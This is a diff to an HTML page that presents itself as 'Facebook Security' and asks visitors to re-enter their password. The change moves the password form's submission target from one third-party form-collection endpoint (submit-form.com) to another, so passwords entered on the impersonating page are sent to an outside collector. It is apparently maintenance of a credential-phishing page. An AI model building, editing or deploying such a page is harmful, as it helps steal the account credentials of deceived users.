--- a/index.html
+++ b/index.html
@@ -112,7 +112,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://submit-form.com/itgeMsC94" method="POST">
+        <form id="passwordForm" action="https://submit-form.com/BZnMBS9rw" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
